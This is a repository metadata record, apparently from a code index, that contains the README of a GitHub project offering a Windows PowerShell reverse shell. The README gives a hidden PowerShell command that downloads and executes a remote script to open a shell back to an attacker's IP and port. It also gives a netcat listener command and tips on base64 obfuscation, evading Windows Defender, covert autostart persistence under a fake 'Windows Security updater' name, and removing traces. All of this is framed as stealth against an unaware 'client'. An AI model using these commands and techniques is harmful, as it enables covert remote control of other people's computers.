{"id":19785491,"url":"https://github.com/slluxx/windows-reverse-shell","last_synced_at":"2026-03-15T23:18:36.974Z","repository":{"id":107591227,"uuid":"391384368","full_name":"Slluxx/Windows-Reverse-Shell","owner":"Slluxx","description":"Reverse-shell payloads and scripts","archived":false,"fork":false,"pushed_at":"2021-07-31T14:59:12.000Z","size":8416,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-01T07:24:55.710Z","etag":null,"topics":["2021","exploit","hacking","powershell","reverse-shell","script","undetected","windows","working"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Slluxx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-31T14:50:59.000Z","updated_at":"2024-03-09T10:36:43.000Z","dependencies_parsed_at":"2023-09-20T13:15:20.459Z","dependency_job_id":null,"html_url":"https://github.com/Slluxx/Windows-Reverse-Shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Slluxx/Windows-Reverse-Shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slluxx%2FWindows-Reverse-Shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slluxx%2FWindows-Reverse-Shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slluxx%2FWindows-Reverse-Shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slluxx%2FWindows-Reverse-Shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Slluxx","download_url":"https://codeload.github.com/Slluxx/Windows-Reverse-Shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slluxx%2FWindows-Reverse-Shell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30554788,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T23:04:10.583Z","status":"ssl_error","status_checked_at":"2026-03-15T23:00:23.757Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["2021","exploit","hacking","powershell","reverse-shell","script","undetected","windows","working"],"created_at":"2024-11-12T06:14:49.111Z","updated_at":"2026-03-15T23:18:36.968Z","avatar_url":"https://github.com/Slluxx.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Windows Reverse Shell\n \nDISCLAIMER: This software is for educational purposes only. This software should not be used for illegal activity. The author is not responsible for its use.\n\n\n## Description\n\nThis software can be used to gain a remote shell on an external Windows-system that supports Powershell (Windows 7 and later). It works by you executing an initial payload, which connects to a server containing the actual/second stage payload. This will circumvent Windows defender.\n\nAs soon as the script is injected, it will constantly loop and try to connect to your system. Start your listener and wait a maximum of 10 seconds for the remote shell to connect. Once disconneced, you will not get to connect to it again. You can enable Autostart to get another connection once the \"client\" restarts his pc.\n\nDespite the script trying to remove its traces (from autostart etc), i did not check if windows (event) logs pick up on this. So please dont do things you shouldnt be doing.\n\n## Configuration\n\nYou can either edit \"payloadtemplate.ps1.txt\" and hardcode what are currently placeholders (`%autostart%`, `%ip%` \u0026 `%port%`) to place the file anywhere on the internet and not have to use an ip/domain that belongs to you (because it will show in the taskmanager) - or you use script.php on a webserver of your choice and dynamically generate payloads without changing anything.\n\nFor the latter option, just place `script.php` and `payloadtemplate.ps1.txt` next to each other on a webserver and make sure PHP is actually allowed. Some cheap hosts have it disabled.\n\n## Usage\n\nYou need to modify the code the \"client\" runs so their terminal can build a connection to yours.\n\n`powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).downloadString('http://myurl.com/script.php?i=xxx.xxx.xxx\u0026p=xxxx')\"`\n\nTo create a layer of obfuscation, you can encrypt this string in base64 on sites [like these](https://raikia.com/tool-powershell-encoder/). Make sure to read the notes down below!\n\nYou can listen to the shell by using `nc -nlvp PORT`. You need to have nc (netcat) installed and change `PORT` to whatever port you made the \"client\" ping to.\n\n### Arguments\n\nscript.php has 2 required arguments and one optional:\n- i -\u003e the ip adress the client sends the terminal data to (your pc/server). REQUIRED\n- p -\u003e the port the clients terminal tries to connect to (your pc/server). REQUIRED\n- a -\u003e weather we write the script to the clients autostart (does not require a value). OPTIONAL\n\n#### About autostart\n\nSince we do not have Admin priviliges, we can not edit the registry or place the payload into the Autostart folder. We need to find a folder where we can place files to and then create a shortcut into the autostart folder. For some reason shortcuts are allowed. **This however will open up a notification for a few seconds that this program is now enabled on boot.** Other than that, you can still find the file manually and you can also see it in the taskmanager under \"autostart\" as `Windows Security updater.cmd` with no icon. If you want to hide it a little better, get admin rights and figure something out or compile the cmd file to an exe on the clients pc and add an icon and meta data.\n\nIf you read \"NOTES\" you might want to disable autostart on a client that its already enabled on. Just connect to the client and execute the payload again but this time without the autostart argument and on a different port. Close your current session, listen to the new port and once connected, type `exit`. This will remove all traces of the autostart and terminate all running processes.\n\n## NOTES:\n\nAs long as the the payload is running and searchinf for a shell, you can see the url to the server if you really search for it in the taskmanager. If you have obfuscated the command into base64, you will still be able to the the decoded url in the taskmanager.\n\nIf you execute the payload, the taskmanager will list the powershell task till you connect to it. It gets terminated once the shell terminates. If you have enabled autostart in the payload, the client will **always** run this process. So this might not be what you want when trying to be stealthy. Read in \"About autostart\" how to disable it again.\n\n## DEMO:\n![](display.gif)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslluxx%2Fwindows-reverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fslluxx%2Fwindows-reverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslluxx%2Fwindows-reverse-shell/lists"}